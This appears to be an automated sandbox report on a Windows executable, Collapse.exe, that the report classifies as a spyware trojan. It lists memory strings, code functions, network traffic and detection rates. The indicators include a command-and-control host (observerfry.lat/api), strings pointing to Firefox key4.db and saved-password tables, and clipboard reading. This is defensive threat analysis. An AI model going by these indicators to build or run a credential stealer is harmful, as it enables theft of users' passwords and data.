                Source: Collapse.exe, 00000006.00000003.1340228879.00000000036C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: Collapse.exe, 00000006.00000003.1340228879.00000000036C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: Collapse.exe, 00000006.00000003.1340228879.00000000036C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: Collapse.exe, 00000006.00000003.1291840782.00000000036EB000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1291946100.00000000036EB000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1291761778.00000000036EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: Collapse.exe, 00000006.00000003.1341744379.000000000102B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
                Source: Collapse.exe, 00000006.00000003.1341744379.000000000102B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
                Source: Collapse.exe, 00000006.00000003.1291840782.00000000036EB000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1291946100.00000000036EB000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1291761778.00000000036EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: Collapse.exe, 00000006.00000003.1291840782.00000000036EB000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1291946100.00000000036EB000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1291761778.00000000036EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: Collapse.exe, 00000006.00000003.1291840782.00000000036EB000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1291946100.00000000036EB000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1291761778.00000000036EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: Collapse.exe, 00000006.00000003.1341744379.000000000102B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                Source: Collapse.exe, 00000006.00000003.1341744379.000000000102B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: Collapse.exe, 00000006.00000003.1291840782.00000000036EB000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1291946100.00000000036EB000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1291761778.00000000036EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: Collapse.exe, 00000006.00000003.1291840782.00000000036EB000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1291946100.00000000036EB000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1291761778.00000000036EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: Collapse.exe, 00000006.00000003.1291840782.00000000036EB000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1291946100.00000000036EB000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1291761778.00000000036EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: Collapse.exe, 00000006.00000003.1341744379.000000000102B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
                Source: Collapse.exe, 00000006.00000003.1688424834.0000000000FA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/
                Source: Collapse.exe, 00000006.00000003.1318726111.000000000101E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/3
                Source: Collapse.exe, 00000006.00000003.1318726111.000000000101E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/C
                Source: Collapse.exe, 00000006.00000003.1404051312.00000000036AF000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1405760756.00000000036AC000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1369666882.00000000036AF000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1363851025.00000000036AF000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1367340017.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1290803924.0000000000FA3000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1341278669.00000000036AC000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1339458436.00000000036A8000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1317503585.00000000036AF000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1339420217.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1403631246.000000000101C000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000002.1689342251.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1368340890.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1365290632.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1364336336.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1339837879.00000000036AC000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1366340370.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1364005005.00000000036AC000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1367866701.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1403543943.00000000036AC000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1365761482.00000000036B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/api
                Source: Collapse.exe, 00000006.00000003.1341278669.00000000036AC000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1339458436.00000000036A8000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1339420217.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1339837879.00000000036AC000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1364005005.00000000036AC000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1363796100.00000000036AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/api4
                Source: Collapse.exe, 00000006.00000002.1689342251.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1447252619.0000000000FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/apiDesk
                Source: Collapse.exe, 00000006.00000003.1404184317.0000000000FF9000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1405881150.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1403986170.0000000000FA3000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000002.1689342251.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1447252619.0000000000FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/apicatinT
                Source: Collapse.exe, 00000006.00000003.1290803924.0000000000FA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/apifM
                Source: Collapse.exe, 00000006.00000003.1374794026.0000000000FA3000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1374993674.0000000000FF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/apifmvh
                Source: Collapse.exe, 00000006.00000003.1404184317.0000000000FF9000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1405881150.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1403986170.0000000000FA3000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000002.1689342251.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1447252619.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1374794026.0000000000FA3000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1374993674.0000000000FF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/apin
                Source: Collapse.exe, 00000006.00000003.1317503585.00000000036AF000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1317483559.00000000036A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/apio
                Source: Collapse.exe, 00000006.00000003.1290803924.0000000000FA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/api~
                Source: Collapse.exe, 00000006.00000003.1403631246.000000000101C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/pi
                Source: Collapse.exe, 00000006.00000003.1403631246.000000000101C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/ve
                Source: Collapse.exe, 00000006.00000003.1374890812.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1290803924.0000000000F84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat:443/api
                Source: Collapse.exe, 00000006.00000003.1290803924.0000000000F84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat:443/api%
                Source: Collapse.exe, 00000006.00000002.1689170640.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1688591837.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1374890812.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1375045759.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1404122051.0000000000F84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat:443/api7wner3.default-release/key4.dbPK
                Source: Collapse.exe, 00000006.00000002.1689170640.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1688591837.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1404122051.0000000000F84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat:443/apin.txtPK
                Source: Collapse.exe, 00000006.00000002.1689170640.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1688591837.0000000000F84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat:443/apiocal
                Source: Collapse.exe, 00000006.00000003.1341339780.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: Collapse.exe, 00000006.00000003.1341339780.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: Collapse.exe, 00000006.00000003.1341744379.000000000102B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
                Source: Collapse.exe, 00000006.00000003.1291840782.00000000036EB000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1291946100.00000000036EB000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1291761778.00000000036EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: Collapse.exe, 00000006.00000003.1291840782.00000000036EB000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1291946100.00000000036EB000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1291761778.00000000036EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: Collapse.exe, 00000006.00000003.1341744379.000000000102B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                Source: Collapse.exe, 00000006.00000003.1341339780.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
                Source: Collapse.exe, 00000006.00000003.1341339780.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
                Source: Collapse.exe, 00000006.00000003.1341339780.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
                Source: Collapse.exe, 00000006.00000003.1341339780.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: Collapse.exe, 00000006.00000003.1341339780.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                Source: unknownHTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49699 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49700 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49701 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49703 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49715 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49726 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49740 version: TLS 1.2
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_00433510 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,6_2_00433510
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_00433510 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,6_2_00433510
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 0_2_0098E0940_2_0098E094
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 0_2_009810000_2_00981000
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 0_2_009A61020_2_009A6102
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 0_2_00992AA10_2_00992AA1
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 0_2_009A43FF0_2_009A43FF
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 0_2_00998D900_2_00998D90
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 0_2_00993EA00_2_00993EA0
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 3_2_0098E0943_2_0098E094
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 3_2_009810003_2_00981000
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 3_2_009A61023_2_009A6102
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 3_2_00992AA13_2_00992AA1
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 3_2_009A43FF3_2_009A43FF
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 3_2_00998D903_2_00998D90
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 3_2_00993EA03_2_00993EA0
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_0040A8706_2_0040A870
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_004228706_2_00422870
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_004118D06_2_004118D0
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_004388E06_2_004388E0
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_004089A06_2_004089A0
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_004379A26_2_004379A2
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_004262106_2_00426210
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_0043C2106_2_0043C210
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_00440AC06_2_00440AC0
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_004104E76_2_004104E7
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_0042C4F66_2_0042C4F6
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_00438C906_2_00438C90
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_0040AD206_2_0040AD20
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_004085D06_2_004085D0
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_0040D6436_2_0040D643
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_004416006_2_00441600
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_0043FF906_2_0043FF90
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_0041A8006_2_0041A800
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_0043F8006_2_0043F800
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_004418006_2_00441800
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_0041D8106_2_0041D810
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_004268376_2_00426837
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_004058E06_2_004058E0
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_0041F0E66_2_0041F0E6
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_004368AC6_2_004368AC
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_0040F8B06_2_0040F8B0
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_0043F8B06_2_0043F8B0
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_004061406_2_00406140
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_004091406_2_00409140
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_0043F9406_2_0043F940
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_004039006_2_00403900
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_0042E9046_2_0042E904
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_004271346_2_00427134
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_004191D06_2_004191D0
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_004381D06_2_004381D0
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_004231E06_2_004231E0
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_0043A1A96_2_0043A1A9
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_0043CA406_2_0043CA40
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_00417A516_2_00417A51
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_00408A706_2_00408A70
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_00425AC96_2_00425AC9
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_004402D06_2_004402D0
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_004042B06_2_004042B0
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_0042235A6_2_0042235A
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_004393706_2_00439370
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_004313206_2_00431320
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_00436B246_2_00436B24
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_00404BE06_2_00404BE0
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_004253E56_2_004253E5
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_004233FA6_2_004233FA
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_004223906_2_00422390
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_004073B06_2_004073B0
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_0042CBBB6_2_0042CBBB
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_0043FC106_2_0043FC10
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_00427C2A6_2_00427C2A
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_004384306_2_00438430
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_0041A4C06_2_0041A4C0
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_00436CED6_2_00436CED
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_00421C8F6_2_00421C8F
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_0042C4906_2_0042C490
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_00415CA06_2_00415CA0
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_00437CB86_2_00437CB8
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_0042CD4B6_2_0042CD4B
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_0042FD536_2_0042FD53
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_004285726_2_00428572
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_004215006_2_00421500
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_0042CD0A6_2_0042CD0A
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_0041D5206_2_0041D520
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_00428D206_2_00428D20
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_0043F5C06_2_0043F5C0
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_004065D06_2_004065D0
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_00424DF06_2_00424DF0
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_0041CD806_2_0041CD80
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_00405DA06_2_00405DA0
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_004095A06_2_004095A0
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_00413DA06_2_00413DA0
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_00410E596_2_00410E59
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_0041BE606_2_0041BE60
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_00414E0D6_2_00414E0D
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_00430E2C6_2_00430E2C
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_004146D06_2_004146D0
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_0043F6D06_2_0043F6D0
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_004226DC6_2_004226DC
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_00402EE06_2_00402EE0
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_00408EF06_2_00408EF0
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_004396F06_2_004396F0
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_004406F06_2_004406F0
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_004257406_2_00425740
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_0041671A6_2_0041671A
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_0043D71C6_2_0043D71C
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_00422F306_2_00422F30
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_0043F5C06_2_0043F5C0
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_0043EFF16_2_0043EFF1
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_00439FF06_2_00439FF0
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_00428D206_2_00428D20
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_004157B06_2_004157B0
                Source: C:\Users\user\Desktop\Collapse.exeCode function: String function: 0099BE0D appears 40 times
                Source: C:\Users\user\Desktop\Collapse.exeCode function: String function: 009975AB appears 42 times
                Source: C:\Users\user\Desktop\Collapse.exeCode function: String function: 00413D90 appears 86 times
                Source: C:\Users\user\Desktop\Collapse.exeCode function: String function: 0098E5A0 appears 98 times
                Source: C:\Users\user\Desktop\Collapse.exeCode function: String function: 00407F40 appears 45 times
                Source: Collapse.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Collapse.exeStatic PE information: Section: .bss ZLIB complexity 1.0003249845551894
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/1@1/2
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_00438C90 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,6_2_00438C90
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3044:120:WilError_03
                Source: Collapse.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\Collapse.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: Collapse.exe, 00000006.00000003.1292597422.00000000036BD000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1292263992.00000000036D9000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1318469011.000000000102C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Collapse.exeReversingLabs: Detection: 36%
                Source: Collapse.exeVirustotal: Detection: 31%
                Source: C:\Users\user\Desktop\Collapse.exeFile read: C:\Users\user\Desktop\Collapse.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\Collapse.exe "C:\Users\user\Desktop\Collapse.exe"
                Source: C:\Users\user\Desktop\Collapse.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Collapse.exeProcess created: C:\Users\user\Desktop\Collapse.exe "C:\Users\user\Desktop\Collapse.exe"
